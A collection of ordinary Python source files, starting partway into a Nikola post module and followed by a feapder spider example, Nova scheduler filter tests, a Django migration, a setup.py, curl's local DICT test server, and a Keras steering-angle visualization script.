with io.open(deps_path, "w+", encoding="utf8") as deps_file:
deps_file.write('\n'.join(deps_list))
else:
if os.path.isfile(deps_path):
os.unlink(deps_path)
def _get_dependencies(self, deps_list):
deps = []
for dep in deps_list:
if dep[0]:
# callable
result = dep[1]()
else:
# can add directly
result = dep[1]
# if result is a list, add its contents
if type(result) == list:
deps.extend(result)
else:
deps.append(result)
return deps
def deps(self, lang):
"""Return a list of file dependencies to build this post's page."""
deps = []
deps.append(self.base_path)
deps.append(self.source_path)
if os.path.exists(self.metadata_path):
deps.append(self.metadata_path)
if lang != self.default_lang:
cand_1 = get_translation_candidate(self.config, self.source_path, lang)
cand_2 = get_translation_candidate(self.config, self.base_path, lang)
if os.path.exists(cand_1):
deps.extend([cand_1, cand_2])
cand_3 = get_translation_candidate(self.config, self.metadata_path, lang)
if os.path.exists(cand_3):
deps.append(cand_3)
if self.meta('data', lang):
deps.append(self.meta('data', lang))
deps += self._get_dependencies(self._dependency_file_page[lang])
deps += self._get_dependencies(self._dependency_file_page[None])
return sorted(set(deps))
def deps_uptodate(self, lang):
"""Return a list of uptodate dependencies to build this post's page.
These dependencies should be included in ``uptodate`` for the task
which generates the page.
"""
deps = []
deps += self._get_dependencies(self._dependency_uptodate_page[lang])
deps += self._get_dependencies(self._dependency_uptodate_page[None])
deps.append(utils.config_changed({1: sorted(self.compiler.config_dependencies)}, 'nikola.post.Post.deps_uptodate:compiler:' + self.source_path))
return deps
def compile(self, lang):
"""Generate the cache/ file with the compiled post."""
dest = self.translated_base_path(lang)
if not self.is_translation_available(lang) and not self.config['SHOW_UNTRANSLATED_POSTS']:
return
# Set the language to the right thing
LocaleBorg().set_locale(lang)
self.compile_html(
self.translated_source_path(lang),
dest,
self.is_two_file,
self,
lang)
Post.write_depfile(dest, self._depfile[dest], post=self, lang=lang)
signal('compiled').send({
'source': self.translated_source_path(lang),
'dest': dest,
'post': self,
'lang': lang,
})
if self.publish_later:
LOGGER.info('{0} is scheduled to be published in the future ({1})'.format(
self.source_path, self.date))
def fragment_deps(self, lang):
"""Return a list of dependencies to build this post's fragment."""
deps = [self.source_path]
if os.path.isfile(self.metadata_path):
deps.append(self.metadata_path)
lang_deps = []
if lang != self.default_lang:
lang_deps = [get_translation_candidate(self.config, d, lang) for d in deps]
deps += lang_deps
deps = [d for d in deps if os.path.exists(d)]
deps += self._get_dependencies(self._dependency_file_fragment[lang])
deps += self._get_dependencies(self._dependency_file_fragment[None])
return sorted(deps)
def fragment_deps_uptodate(self, lang):
"""Return a list of file dependencies to build this post's fragment."""
deps = []
deps += self._get_dependencies(self._dependency_uptodate_fragment[lang])
deps += self._get_dependencies(self._dependency_uptodate_fragment[None])
deps.append(utils.config_changed({1: sorted(self.compiler.config_dependencies)}, 'nikola.post.Post.deps_uptodate:compiler:' + self.source_path))
return deps
def is_translation_available(self, lang):
"""Return True if the translation actually exists."""
return lang in self.translated_to
def translated_source_path(self, lang):
"""Return path to the translation's source file."""
if lang in self.translated_to:
if lang == self.default_lang:
return self.source_path
else:
return get_translation_candidate(self.config, self.source_path, lang)
elif lang != self.default_lang:
return self.source_path
else:
return get_translation_candidate(self.config, self.source_path, sorted(self.translated_to)[0])
def translated_base_path(self, lang):
"""Return path to the translation's base_path file."""
return get_translation_candidate(self.config, self.base_path, lang)
def _translated_file_path(self, lang):
"""Return path to the translation's file, or to the original."""
if lang in self.translated_to:
if lang == self.default_lang:
return self.base_path
else:
return get_translation_candidate(self.config, self.base_path, lang)
elif lang != self.default_lang:
return self.base_path
else:
return get_translation_candidate(self.config, self.base_path, sorted(self.translated_to)[0])
def text(self, lang=None, teaser_only=False, strip_html=False, show_read_more_link=True,
feed_read_more_link=False, feed_links_append_query=None):
"""Read the post file for that language and return its contents.
teaser_only=True breaks at the teaser marker and returns only the teaser.
strip_html=True removes HTML tags
show_read_more_link=False does not add the Read more... link
feed_read_more_link=True uses FEED_READ_MORE_LINK instead of INDEX_READ_MORE_LINK
lang=None uses the last used to set locale
All links in the returned HTML will be relative.
The HTML returned is a bare fragment, not a full document.
"""
if lang is None:
lang = nikola.utils.LocaleBorg().current_lang
file_name = self._translated_file_path(lang)
# Yes, we compile it and screw it.
# This may be controversial, but the user (or someone) is asking for the post text
# and the post should not just refuse to give it.
if not os.path.isfile(file_name):
self.compile(lang)
with io.open(file_name, "r", encoding="utf8") as post_file:
data = post_file.read().strip()
if self.compiler.extension() == '.php':
return data
try:
document = lxml.html.fragment_fromstring(data, "body")
except lxml.etree.ParserError as e:
# if we don't catch this, it breaks later (Issue #374)
if str(e) == "Document is empty":
return ""
# let other errors raise
raise
base_url = self.permalink(lang=lang)
document.make_links_absolute(base_url)
if self.hyphenate:
hyphenate(document, lang)
try:
data = lxml.html.tostring(document.body, encoding='unicode')
except Exception:
data = lxml.html.tostring(document, encoding='unicode')
if teaser_only:
teaser_regexp = self.config.get('TEASER_REGEXP', TEASER_REGEXP)
teaser = teaser_regexp.split(data)[0]
if teaser != data:
if not strip_html and show_read_more_link:
if teaser_regexp.search(data).groups()[-1]:
teaser_text = teaser_regexp.search(data).groups()[-1]
else:
teaser_text = self.messages[lang]["Read more"]
l = self.config['FEED_READ_MORE_LINK'](lang) if feed_read_more_link else self.config['INDEX_READ_MORE_LINK'](lang)
teaser += l.format(
link=self.permalink(lang, query=feed_links_append_query),
read_more=teaser_text,
min_remaining_read=self.messages[lang]["%d min remaining to read"] % (self.remaining_reading_time),
reading_time=self.reading_time,
remaining_reading_time=self.remaining_reading_time,
paragraph_count=self.paragraph_count,
remaining_paragraph_count=self.remaining_paragraph_count,
post_title=self.title(lang))
# This closes all open tags and sanitizes the broken HTML
document = lxml.html.fromstring(teaser)
try:
data = lxml.html.tostring(document.body, encoding='unicode')
except IndexError:
data = lxml.html.tostring(document, encoding='unicode')
if data and strip_html:
try:
# Not all posts have a body. For example, you may have a page statically defined in the template that does not take content as input.
content = lxml.html.fromstring(data)
data = content.text_content().strip() # No whitespace wanted.
except (lxml.etree.ParserError, ValueError):
data = ""
elif data:
if self.demote_headers:
# see above
try:
document = lxml.html.fromstring(data)
demote_headers(document, self.demote_headers)
data = lxml.html.tostring(document.body, encoding='unicode')
except (lxml.etree.ParserError, IndexError):
data = lxml.html.tostring(document, encoding='unicode')
return data
@property
def reading_time(self):
"""Return reading time based on length of text."""
if self._reading_time is None:
text = self.text(strip_html=True)
words_per_minute = 220
words = len(text.split())
markup = lxml.html.fromstring(self.text(strip_html=False))
embeddables = [".//img", ".//picture", ".//video", ".//audio", ".//object", ".//iframe"]
media_time = 0
for embedded in embeddables:
media_time += (len(markup.findall(embedded)) * 0.33) # +20 seconds
self._reading_time = int(ceil((words / words_per_minute) + media_time)) or 1
return self._reading_time
@property
def remaining_reading_time(self):
"""Remaining reading time based on length of text (does not include teaser)."""
if self._remaining_reading_time is None:
text = self.text(teaser_only=True, strip_html=True)
words_per_minute = 220
words = len(text.split())
self._remaining_reading_time = self.reading_time - int(ceil(words / words_per_minute)) or 1
return self._remaining_reading_time
@property
def paragraph_count(self):
"""Return the paragraph count for this post."""
if self._paragraph_count is None:
# duplicated with Post.text()
lang = nikola.utils.LocaleBorg().current_lang
file_name = self._translated_file_path(lang)
with io.open(file_name, "r", encoding="utf8") as post_file:
data = post_file.read().strip()
try:
document = lxml.html.fragment_fromstring(data, "body")
except lxml.etree.ParserError as e:
# if we don't catch this, it breaks later (Issue #374)
if str(e) == "Document is empty":
return ""
# let other errors raise
raise
# output is a float, for no real reason at all
self._paragraph_count = int(document.xpath('count(//p)'))
return self._paragraph_count
@property
def remaining_paragraph_count(self):
"""Return the remaining paragraph count for this post (does not include teaser)."""
if self._remaining_paragraph_count is None:
try:
# Just asking self.text() is easier here.
document = lxml.html.fragment_fromstring(self.text(teaser_only=True, show_read_more_link=False), "body")
except lxml.etree.ParserError as e:
# if we don't catch this, it breaks later (Issue #374)
if str(e) == "Document is empty":
return ""
# let other errors raise
raise
self._remaining_paragraph_count = self.paragraph_count - int(document.xpath('count(//p)'))
return self._remaining_paragraph_count
def source_link(self, lang=None):
"""Return absolute link to the post's source."""
ext = self.source_ext(True)
link = "/" + self.destination_path(lang=lang, extension=ext, sep='/')
link = utils.encodelink(link)
return link
def destination_path(self, lang=None, extension='.html', sep=os.sep):
"""Destination path for this post, relative to output/.
If lang is not specified, it's the current language.
Extension is used in the path if specified.
"""
if lang is None:
lang = nikola.utils.LocaleBorg().current_lang
folder = self.folders[lang]
if self.has_pretty_url(lang):
path = os.path.join(self.translations[lang],
folder, self.meta[lang]['slug'], 'index' + extension)
else:
path = os.path.join(self.translations[lang],
folder, self.meta[lang]['slug'] + extension)
if sep != os.sep:
path = path.replace(os.sep, sep)
if path.startswith('./'):
path = path[2:]
return path
def permalink(self, lang=None, absolute=False, extension='.html', query=None):
"""Return permalink for a post."""
if lang is None:
lang = nikola.utils.LocaleBorg().current_lang
# Let compilers override extension (e.g. the php compiler)
if self.compiler.extension() != '.html':
extension = self.compiler.extension()
pieces = self.translations[lang].split(os.sep)
pieces += self.folders[lang].split(os.sep)
if self.has_pretty_url(lang):
pieces += [self.meta[lang]['slug'], 'index' + extension]
else:
pieces += [self.meta[lang]['slug'] + extension]
pieces = [_f for _f in pieces if _f and _f != '.']
link = '/' + '/'.join(pieces)
if absolute:
link = urljoin(self.base_url, link[1:])
index_len = len(self.index_file)
if self.strip_indexes and link[-(1 + index_len):] == '/' + self.index_file:
link = link[:-index_len]
if query:
link = link + "?" + query
link = utils.encodelink(link)
return link
@property
def previewimage(self, lang=None):
"""Return the previewimage path."""
if lang is None:
lang = nikola.utils.LocaleBorg().current_lang
image_path = self.meta[lang]['previewimage']
if not image_path:
return None
# This is further parsed by the template, because we don’t have access
# to the URL replacer here. (Issue #1473)
return image_path
def source_ext(self, prefix=False):
"""Return the source file extension.
If `prefix` is True, a `.src.` prefix will be added to the resulting extension
if it's equal to the destination extension.
"""
ext = os.path.splitext(self.source_path)[1]
# do not publish PHP sources
if prefix and ext == '.html':
# ext starts with a dot
return '.src' + ext
else:
return ext
def get_metadata_from_file(source_path, post, config, lang, metadata_extractors_by):
"""Extract metadata from the file itself, by parsing contents."""
try:
if lang and config:
source_path = get_translation_candidate(config, source_path, lang)
elif lang:
source_path += '.' + lang
with io.open(source_path, "r", encoding="utf-8-sig") as meta_file:
source_text = meta_file.read()
except (UnicodeDecodeError, UnicodeEncodeError):
msg = 'Error reading {0}: Nikola only supports UTF-8 files'.format(source_path)
LOGGER.error(msg)
raise ValueError(msg)
except Exception: # The file may not exist, for multilingual sites
return {}, None
meta = {}
used_extractor = None
for priority in metadata_extractors.MetaPriority:
found_in_priority = False
for extractor in metadata_extractors_by['priority'].get(priority, []):
if not metadata_extractors.check_conditions(post, source_path, extractor.conditions, config, source_text):
continue
extractor.check_requirements()
new_meta = extractor.extract_text(source_text)
if new_meta:
found_in_priority = True
used_extractor = extractor
# Map metadata from other platforms to names Nikola expects (Issue #2817)
# Map metadata values (Issue #3025)
map_metadata(new_meta, extractor.map_from, config)
meta.update(new_meta)
break
if found_in_priority:
break
return meta, used_extractor
def get_metadata_from_meta_file(path, post, config, lang, metadata_extractors_by=None):
"""Take a post path, and gets data from a matching .meta file."""
meta_path = os.path.splitext(path)[0] + '.meta'
if lang and config:
meta_path = get_translation_candidate(config, meta_path, lang)
elif lang:
meta_path += '.' + lang
if os.path.isfile(meta_path):
return get_metadata_from_file(meta_path, post, config, lang, metadata_extractors_by)
elif lang:
# Metadata file doesn't exist, but not default language,
# So, if default language metadata exists, return that.
# This makes the 2-file format detection more reliable (Issue #525)
return get_metadata_from_meta_file(meta_path, post, config, None, metadata_extractors_by)
else: # No 2-file metadata
return {}, None
def get_meta(post, lang):
"""Get post meta from compiler or source file."""
meta = defaultdict(lambda: '')
used_extractor = None
config = getattr(post, 'config', None)
metadata_extractors_by = getattr(post, 'metadata_extractors_by')
if metadata_extractors_by is None:
metadata_extractors_by = metadata_extractors.default_metadata_extractors_by()
# If meta file exists, use it
metafile_meta, used_extractor = get_metadata_from_meta_file(post.metadata_path, post, config, lang, metadata_extractors_by)
is_two_file = bool(metafile_meta)
# Filename-based metadata extractors (priority 1).
if config.get('FILE_METADATA_REGEXP'):
extractors = metadata_extractors_by['source'].get(metadata_extractors.MetaSource.filename, [])
for extractor in extractors:
if not metadata_extractors.check_conditions(post, post.source_path, extractor.conditions, config, None):
continue
meta.update(extractor.extract_filename(post.source_path, lang))
# Fetch compiler metadata (priority 2, overrides filename-based metadata).
compiler_meta = {}
if (getattr(post, 'compiler', None) and post.compiler.supports_metadata and
metadata_extractors.check_conditions(post, post.source_path, post.compiler.metadata_conditions, config, None)):
compiler_meta = post.compiler.read_metadata(post, lang=lang)
used_extractor = post.compiler
meta.update(compiler_meta)
# Meta files and inter-file metadata (priority 3, overrides compiler and filename-based metadata).
if not metafile_meta:
new_meta, used_extractor = get_metadata_from_file(post.source_path, post, config, lang, metadata_extractors_by)
meta.update(new_meta)
else:
meta.update(metafile_meta)
if lang is None:
# Only perform these checks for the default language
if 'slug' not in meta:
# If no slug is found in the metadata use the filename
meta['slug'] = slugify(os.path.splitext(
os.path.basename(post.source_path))[0], post.default_lang)
if 'title' not in meta:
# If no title is found, use the filename without extension
meta['title'] = os.path.splitext(
os.path.basename(post.source_path))[0]
# Set one-file status basing on default language only (Issue #3191)
if is_two_file or lang is None:
post.is_two_file = is_two_file
return meta, used_extractor
def hyphenate(dom, _lang):
"""Hyphenate a post."""
# circular import prevention
from .nikola import LEGAL_VALUES
lang = None
if pyphen is not None:
lang = LEGAL_VALUES['PYPHEN_LOCALES'].get(_lang, pyphen.language_fallback(_lang))
else:
utils.req_missing(['pyphen'], 'hyphenate texts', optional=True)
hyphenator = None
if pyphen is not None and lang is not None:
# If pyphen does exist, we tell the user when configuring the site.
# If it does not support a language, we ignore it quietly.
try:
hyphenator = pyphen.Pyphen(lang=lang)
except KeyError:
LOGGER.error("Cannot find hyphenation dictoniaries for {0} (from {1}).".format(lang, _lang))
LOGGER.error("Pyphen cannot be installed to ~/.local (pip install --user).")
if hyphenator is not None:
for tag in ('p', 'li', 'span'):
for node in dom.xpath("//%s[not(parent::pre)]" % tag):
skip_node = False
skippable_nodes = ['kbd', 'pre', 'code', 'samp', 'mark', 'math', 'data', 'ruby', 'svg']
if node.getchildren():
for child in node.getchildren():
if child.tag in skippable_nodes or (child.tag == 'span' and 'math'
in child.get('class', [])):
skip_node = True
elif 'math' in node.get('class', []):
skip_node = True
if not skip_node:
insert_hyphens(node, hyphenator)
return dom
def insert_hyphens(node, hyphenator):
"""Insert hyphens into a node."""
textattrs = ('text', 'tail')
if isinstance(node, lxml.etree._Entity):
# HTML entities have no .text
textattrs = ('tail',)
for attr in textattrs:
text = getattr(node, attr)
if not text:
continue
new_data = ' '.join([hyphenator.inserted(w, hyphen='\u00AD')
for w in text.split(' ')])
# Spaces are trimmed, we have to add them manually back
if text[0].isspace():
new_data = ' ' + new_data
if text[-1].isspace():
new_data += ' '
setattr(node, attr, new_data)
for child in node.iterchildren():
insert_hyphens(child, hyphenator)
|
# -*- coding: utf-8 -*-
"""
Created on 2020/4/22 10:41 PM
---------
@summary:
---------
@author: Boris
@email: boris@bzkj.tech
"""
import feapder
class TestAirSpider(feapder.AirSpider):
# __custom_setting__ = dict(
# LOG_LEVEL = "INFO"
# )
def start_callback(self):
print("爬虫开始")
def end_callback(self):
print("爬虫结束")
def start_requests(self, *args, **kws):
yield feapder.Request("https://www.baidu.com")
def download_midware(self, request):
# request.headers = {'User-Agent': ""}
# request.proxies = {"https":"https://12.12.12.12:6666"}
# request.cookies = {}
return request
def validate(self, request, response):
if response.status_code != 200:
raise Exception("response code not 200") # 重试
# if "哈哈" not in response.text:
# return False # 抛弃当前请求
def parse(self, request, response):
print(response.bs4().title)
print(response.xpath("//title").extract_first())
if __name__ == "__main__":
TestAirSpider().start()
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
from nova.scheduler.filters import aggregate_multitenancy_isolation as ami
from nova import test
from nova.tests.unit.scheduler import fakes
@mock.patch('nova.scheduler.filters.utils.aggregate_metadata_get_by_host')
class TestAggregateMultitenancyIsolationFilter(test.NoDBTestCase):
def setUp(self):
super(TestAggregateMultitenancyIsolationFilter, self).setUp()
self.filt_cls = ami.AggregateMultiTenancyIsolation()
def test_aggregate_multi_tenancy_isolation_with_meta_passes(self,
agg_mock):
agg_mock.return_value = {'filter_tenant_id': set(['my_tenantid'])}
filter_properties = {'context': mock.sentinel.ctx,
'request_spec': {
'instance_properties': {
'project_id': 'my_tenantid'}}}
host = fakes.FakeHostState('host1', 'compute', {})
self.assertTrue(self.filt_cls.host_passes(host, filter_properties))
def test_aggregate_multi_tenancy_isolation_with_meta_passes_comma(self,
agg_mock):
agg_mock.return_value = {'filter_tenant_id':
set(['my_tenantid', 'mytenantid2'])}
filter_properties = {'context': mock.sentinel.ctx,
'request_spec': {
'instance_properties': {
'project_id': 'my_tenantid'}}}
host = fakes.FakeHostState('host1', 'compute', {})
self.assertTrue(self.filt_cls.host_passes(host, filter_properties))
def test_aggregate_multi_tenancy_isolation_fails(self, agg_mock):
agg_mock.return_value = {'filter_tenant_id': set(['other_tenantid'])}
filter_properties = {'context': mock.sentinel.ctx,
'request_spec': {
'instance_properties': {
'project_id': 'my_tenantid'}}}
host = fakes.FakeHostState('host1', 'compute', {})
self.assertFalse(self.filt_cls.host_passes(host, filter_properties))
def test_aggregate_multi_tenancy_isolation_fails_comma(self, agg_mock):
agg_mock.return_value = {'filter_tenant_id':
set(['other_tenantid', 'other_tenantid2'])}
filter_properties = {'context': mock.sentinel.ctx,
'request_spec': {
'instance_properties': {
'project_id': 'my_tenantid'}}}
host = fakes.FakeHostState('host1', 'compute', {})
self.assertFalse(self.filt_cls.host_passes(host, filter_properties))
def test_aggregate_multi_tenancy_isolation_no_meta_passes(self, agg_mock):
agg_mock.return_value = {}
filter_properties = {'context': mock.sentinel.ctx,
'request_spec': {
'instance_properties': {
'project_id': 'my_tenantid'}}}
host = fakes.FakeHostState('host1', 'compute', {})
self.assertTrue(self.filt_cls.host_passes(host, filter_properties))
|
# Generated by Django 3.2 on 2021-07-12 19:13
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='portfolio',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=50, unique=True)),
('body', models.TextField()),
],
),
]
|
import re
from pathlib import Path
from setuptools import setup, find_packages
###############################################################################
# Package meta-data.
NAME = 'npyfile'
PROJECT_URLS = {
'Documentation': 'https://npyfile.readthedocs.io/',
'Source Code': 'https://github.com/maxstrobel/npyfile',
'Bug Tracker': 'https://github.com/maxstrobel/npyfile/issues',
}
CLASSIFIERS = [
'Intended Audience :: Developers',
'Intended Audience :: Science/Research',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 3 :: Only',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
'Programming Language :: Python :: 3.9',
'Programming Language :: Python :: Implementation :: CPython',
'Topic :: Scientific/Engineering',
'Topic :: Software Development',
'Typing :: Typed',
]
PYTHON_REQUIRES = '>=3.6'
# What packages are required for this module to be executed?
INSTALL_REQUIRES = ['numpy']
# What packages are optional?
EXTRAS_REQUIRE = {
'docs': ['sphinx', 'sphinx_autodoc_typehints', 'sphinx-rtd-theme'],
'tests': ['coverage', 'pytest', 'tox'],
}
EXTRAS_REQUIRE['dev'] = (EXTRAS_REQUIRE['docs'] + EXTRAS_REQUIRE['tests'])
# Define here entry points for the package
ENTRY_POINTS = {
'console_scripts': []
}
###############################################################################
def read(rel_path):
HERE = Path(__file__).resolve().parent
with open(HERE / rel_path, 'r', encoding='utf-8') as f:
return f.read()
# Meta data is stored on package level __init__.py -> Meta data also accessible in python
META_FILE = read(f'src/{NAME}/__init__.py')
def find_meta(meta):
"""
Extract __*meta*__ from META_FILE.
"""
meta_match = re.search(f"""^__{meta}__ = ['"]([^'"]*)['"]""", META_FILE, re.M)
if meta_match:
return meta_match.group(1)
raise RuntimeError(f'Unable to find __{meta}__ string.')
# Import the README and use it as the long-description.
# Note: this will only work if 'README.md' is present in your MANIFEST.in file!
DESCRIPTION = find_meta('description')
try:
LONG = read('README.rst').split(".. teaser-begin")[1]
except FileNotFoundError:
LONG = DESCRIPTION
# Where the magic happens:
setup(
name=NAME,
version=find_meta('version'),
description=DESCRIPTION,
long_description=LONG,
long_description_content_type='text/x-rst',
author=find_meta('author'),
author_email=find_meta('email'),
maintainer=find_meta('author'),
maintainer_email=find_meta('email'),
python_requires=PYTHON_REQUIRES,
url=find_meta('url'),
project_urls=PROJECT_URLS,
packages=find_packages(where='src'),
package_dir={'': 'src'},
entry_points=ENTRY_POINTS,
classifiers=CLASSIFIERS,
install_requires=INSTALL_REQUIRES,
extras_require=EXTRAS_REQUIRE,
include_package_data=True,
)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#***************************************************************************
# _ _ ____ _
# Project ___| | | | _ \| |
# / __| | | | |_) | |
# | (__| |_| | _ <| |___
# \___|\___/|_| \_\_____|
#
# Copyright (C) 2008 - 2020, Daniel Stenberg, <daniel@haxx.se>, et al.
#
# This software is licensed as described in the file COPYING, which
# you should have received as part of this distribution. The terms
# are also available at https://carl.se/docs/copyright.html.
#
# You may opt to use, copy, modify, merge, publish, distribute and/or sell
# copies of the Software, and permit persons to whom the Software is
# furnished to do so, under the terms of the COPYING file.
#
# This software is distributed on an "AS IS" basis, WITHOUT WARRANTY OF ANY
# KIND, either express or implied.
#
###########################################################################
#
""" DICT server """
from __future__ import (absolute_import, division, print_function,
unicode_literals)
import argparse
import logging
import os
import sys
from util import ClosingFileHandler
try: # Python 2
import SocketServer as socketserver
except ImportError: # Python 3
import socketserver
log = logging.getLogger(__name__)
HOST = "localhost"
# The strings that indicate the test framework is checking our aliveness
VERIFIED_REQ = b"verifiedserver"
VERIFIED_RSP = "WE ROOLZ: {pid}"
def dictserver(options):
"""
Starts up a TCP server with a DICT handler and serves DICT requests
forever.
"""
if options.pidfile:
pid = os.getpid()
# see tests/server/util.c function write_pidfile
if os.name == "nt":
pid += 65536
with open(options.pidfile, "w") as f:
f.write(str(pid))
local_bind = (options.host, options.port)
log.info("[DICT] Listening on %s", local_bind)
# Need to set the allow_reuse on the class, not on the instance.
socketserver.TCPServer.allow_reuse_address = True
server = socketserver.TCPServer(local_bind, DictHandler)
server.serve_forever()
return ScriptRC.SUCCESS
class DictHandler(socketserver.BaseRequestHandler):
"""Handler class for DICT connections.
"""
def handle(self):
"""
Simple function which responds to all queries with a 552.
"""
try:
# First, send a response to allow the server to continue.
rsp = "220 dictserver <xnooptions> <msgid@msgid>\n"
self.request.sendall(rsp.encode("utf-8"))
# Receive the request.
data = self.request.recv(1024).strip()
log.debug("[DICT] Incoming data: %r", data)
if VERIFIED_REQ in data:
log.debug("[DICT] Received verification request from test "
"framework")
pid = os.getpid()
# see tests/server/util.c function write_pidfile
if os.name == "nt":
pid += 65536
response_data = VERIFIED_RSP.format(pid=pid)
else:
log.debug("[DICT] Received normal request")
response_data = "No matches"
# Send back a failure to find.
response = "552 {0}\n".format(response_data)
log.debug("[DICT] Responding with %r", response)
self.request.sendall(response.encode("utf-8"))
except IOError:
log.exception("[DICT] IOError hit during request")
def get_options():
parser = argparse.ArgumentParser()
parser.add_argument("--port", action="store", default=9016,
type=int, help="port to listen on")
parser.add_argument("--host", action="store", default=HOST,
help="host to listen on")
parser.add_argument("--verbose", action="store", type=int, default=0,
help="verbose output")
parser.add_argument("--pidfile", action="store",
help="file name for the PID")
parser.add_argument("--logfile", action="store",
help="file name for the log")
parser.add_argument("--srcdir", action="store", help="test directory")
parser.add_argument("--id", action="store", help="server ID")
parser.add_argument("--ipv4", action="store_true", default=0,
help="IPv4 flag")
return parser.parse_args()
def setup_logging(options):
"""
Set up logging from the command line options
"""
root_logger = logging.getLogger()
add_stdout = False
formatter = logging.Formatter("%(asctime)s %(levelname)-5.5s %(message)s")
# Write out to a logfile
if options.logfile:
handler = ClosingFileHandler(options.logfile)
handler.setFormatter(formatter)
handler.setLevel(logging.DEBUG)
root_logger.addHandler(handler)
else:
# The logfile wasn't specified. Add a stdout logger.
add_stdout = True
if options.verbose:
# Add a stdout logger as well in verbose mode
root_logger.setLevel(logging.DEBUG)
add_stdout = True
else:
root_logger.setLevel(logging.INFO)
if add_stdout:
stdout_handler = logging.StreamHandler(sys.stdout)
stdout_handler.setFormatter(formatter)
stdout_handler.setLevel(logging.DEBUG)
root_logger.addHandler(stdout_handler)
class ScriptRC(object):
"""Enum for script return codes"""
SUCCESS = 0
FAILURE = 1
EXCEPTION = 2
class ScriptException(Exception):
pass
if __name__ == '__main__':
# Get the options from the user.
options = get_options()
# Setup logging using the user options
setup_logging(options)
# Run main script.
try:
rc = dictserver(options)
except Exception as e:
log.exception(e)
rc = ScriptRC.EXCEPTION
log.info("[DICT] Returning %d", rc)
sys.exit(rc)
|
import argparse
import base64
import json
import cv2
import numpy as np
import matplotlib.pyplot as plt
from keras.models import model_from_json
from keras.preprocessing.image import ImageDataGenerator, array_to_img, img_to_array
# Fix error with Keras and TensorFlow
import tensorflow as tf
tf.python.control_flow_ops = tf
def displayCV2(img):
'''
Utility method to display a CV2 Image
'''
cv2.imshow('image',img)
cv2.waitKey(0)
cv2.destroyAllWindows()
def process_img_for_video(image, angle, pred_angle, frame):
'''
Used by visualize_dataset method to format image prior to adding to video
'''
font = cv2.FONT_HERSHEY_SIMPLEX
img = cv2.cvtColor(image, cv2.COLOR_YUV2BGR)
img = cv2.resize(img,None,fx=3, fy=3, interpolation = cv2.INTER_CUBIC)
h,w = img.shape[0:2]
# apply text for frame number and steering angle
cv2.putText(img, 'frame: ' + str(frame), org=(2,18), fontFace=font, fontScale=.5, color=(255,255,255), thickness=1)
cv2.putText(img, 'angle: ' + str(angle), org=(2,33), fontFace=font, fontScale=.5, color=(255,255,255), thickness=1)
# apply a line representing the steering angle
cv2.line(img,(int(w/2),int(h)),(int(w/2+angle*w/4),int(h/2)),(0,255,0),thickness=4)
if pred_angle is not None:
cv2.line(img,(int(w/2),int(h)),(int(w/2+pred_angle*w/4),int(h/2)),(0,0,255),thickness=4)
return img
def visualize_dataset(X,y,y_pred=None):
'''
format the data from the dataset (image, steering angle) and place it into a video file
'''
for i in range(len(X)):
if y_pred is not None:
img = process_img_for_video(X[i], y[i], y_pred[i], i)
else:
img = process_img_for_video(X[i], y[i], None, i)
displayCV2(img)
def preprocess_image(img):
'''
Method for preprocessing images: this method is the same used in drive.py, except this version uses
BGR to YUV and drive.py uses RGB to YUV (due to using cv2 to read the image here, where drive.py images are
received in RGB)
'''
# original shape: 160x320x3, input shape for neural net: 66x200x3
# crop to 105x320x3
#new_img = img[35:140,:,:]
# crop to 40x320x3
new_img = img[80:140,:,:]
# apply subtle blur
#new_img = cv2.GaussianBlur(new_img, (5,5), 0)
# scale to 66x200x3 (same as nVidia)
new_img = cv2.resize(new_img,(200, 66), interpolation = cv2.INTER_AREA)
# scale to ?x?x3
#new_img = cv2.resize(new_img,(80, 10), interpolation = cv2.INTER_AREA)
# convert to YUV color space (as nVidia paper suggests)
new_img = cv2.cvtColor(new_img, cv2.COLOR_BGR2YUV)
return new_img
def generate_training_data_for_visualization(image_paths, angles, batch_size=20, validation_flag=False):
'''
method for the model training data generator to load, process, and distort images
if 'validation_flag' is true the image is not distorted
'''
X = []
y = []
for i in range(batch_size):
img = cv2.imread(image_paths[i])
angle = angles[i]
img = preprocess_image(img)
if not validation_flag:
img, angle = random_distort(img, angle)
X.append(img)
y.append(angle)
return (np.array(X), np.array(y))
if __name__ == '__main__':
'''
This little guy mostly takes bits from drive.py and model.py to help clean up some data, pulling the data points
that generate the most erroneous predictions from the model and visualizing them (to make sure they're actually bad)
so I can then edit the actual steering angle values in the csv file
'''
parser = argparse.ArgumentParser(description='Remote Driving')
parser.add_argument('model', type=str,
help='Path to model definition json. Model weights should be on the same path.')
args = parser.parse_args()
with open(args.model, 'r') as jfile:
# NOTE: if you saved the file by calling json.dump(model.to_json(), ...)
# then you will have to call:
#
# model = model_from_json(json.loads(jfile.read()))\
#
# instead.
model = model_from_json(jfile.read())
model.compile("adam", "mse")
weights_file = args.model.replace('json', 'h5')
model.load_weights(weights_file)
using_udacity_data = False
img_path_prepend = ''
csv_path = './training_data/driving_log.csv'
if using_udacity_data:
img_path_prepend = getcwd() + '/udacity_data/'
csv_path = './udacity_data/driving_log.csv'
import csv
# Import driving data from csv
with open(csv_path, newline='') as f:
driving_data = list(csv.reader(f, skipinitialspace=True, delimiter=',', quoting=csv.QUOTE_NONE))
image_paths = []
angles = []
# Gather data - image paths and angles for center, left, right cameras in each row
for row in driving_data[1:]:
# skip it if ~0 speed - not representative of driving behavior
if float(row[6]) < 0.1 :
continue
# get center image path and angle
image_paths.append(img_path_prepend + row[0])
angles.append(float(row[3]))
image_paths = np.array(image_paths)
angles = np.array(angles)
print('shapes:', image_paths.shape, angles.shape)
# visualize some predictions
n = 12
X_test,y_test = generate_training_data_for_visualization(image_paths[:n], angles[:n], batch_size=n, validation_flag=True)
y_pred = model.predict(X_test, n, verbose=2)
